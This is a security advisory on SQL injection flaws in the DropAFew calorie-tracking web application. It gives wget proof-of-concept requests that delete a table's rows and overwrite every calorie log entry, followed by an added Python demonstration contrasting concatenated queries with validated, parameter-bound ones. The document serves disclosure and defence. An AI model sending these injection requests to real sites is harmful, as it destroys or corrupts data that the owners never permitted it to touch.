DropAFew Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept requests are available:

# create new user
wget --save-cookies cookies --keep-session-cookies --post-data='username=exploit&password=1&password_confirm=1' http://[target]/calorie/newaccount2.php

# delete foodfacts table
wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php

# make everyone have eaten 1000 strawberries, but hey, they were only 10 calories ...
wget --load-cookies cookies --post-data='action=save&id=1&date=20070101&time=23232323&vendor=nature&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*' http://[target]/calorie/editlogcal.php
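
Added example, not part of the original advisory and not DropAFew's own code: it replays the two POST bodies above against an in-memory SQLite stand-in to show why the numeric id and calories fields widen the statement when concatenated, and how integer validation plus bound parameters stops it. The table layout, the concatenated query shape and all function names are assumptions made for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

# POST bodies copied from the two wget commands above.
DELETE_POC = "id=1%20OR%20id%20>%200--&action=del"
UPDATE_POC = ("action=save&id=1&date=20070101&time=23232323&vendor=nature"
              "&item=strawberries&portion=1000&calories=10+WHERE+id+%3E+0+%2F*")

def decode(post_data):
    """URL-decode a form body the way the server would before using it."""
    return {k: v[0] for k, v in parse_qs(post_data).items()}

def fresh_db():
    """Constructed stand-in tables; the application's real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE foodfacts (id INTEGER PRIMARY KEY, item TEXT)")
    db.execute("CREATE TABLE log (id INTEGER PRIMARY KEY, item TEXT, calories INTEGER)")
    db.executemany("INSERT INTO foodfacts VALUES (?, ?)",
                   [(1, "apple"), (2, "pear"), (3, "plum")])
    db.executemany("INSERT INTO log VALUES (?, ?, ?)",
                   [(1, "toast", 120), (2, "soup", 200)])
    return db

# Assumed vulnerable pattern: numeric fields pasted straight into the statement.
def delete_concat(db, form):
    return db.execute("DELETE FROM foodfacts WHERE id = " + form["id"]).rowcount

def update_concat(db, form):
    sql = "UPDATE log SET calories = " + form["calories"] + " WHERE id = " + form["id"]
    return db.execute(sql).rowcount

def as_int(value):
    """Accept only plain ASCII decimal digits for numeric form fields."""
    if not (value.isascii() and value.isdigit()):
        raise ValueError("not an integer: %r" % value)
    return int(value)

# Hardened form: validate the type, then bind the value as a parameter.
def delete_bound(db, form):
    return db.execute("DELETE FROM foodfacts WHERE id = ?",
                      (as_int(form["id"]),)).rowcount

def update_bound(db, form):
    return db.execute("UPDATE log SET calories = ? WHERE id = ?",
                      (as_int(form["calories"]), as_int(form["id"]))).rowcount
```

With the concatenated statements the request for id 1 touches every row; the bound versions reject both bodies before any SQL runs.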


 

Copyright 2010, SecurityFocus